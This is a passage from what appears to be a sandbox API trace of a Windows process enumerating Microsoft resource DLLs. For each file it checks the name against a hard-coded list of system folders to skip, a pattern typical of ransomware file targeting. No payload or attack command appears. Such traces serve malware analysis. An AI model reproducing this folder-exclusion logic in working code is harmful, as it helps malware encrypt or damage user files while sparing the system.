lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.838] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47af0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d920, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.838] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffddb96c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffddb96c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffddb96c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8090, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.839] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.839] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x632fb8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x632fb8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x632fb8e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a098, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d698, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.840] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x69980f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69be349, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.840] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d698, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d920, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.841] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80fc2c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80fc2c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80fc2c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb070, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.841] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb78613f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb78613f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb7ac3b6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.841] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.842] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d770, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.842] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80fc2c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80fc2c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80fc2c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaae8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.842] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.842] lstrcmpiW 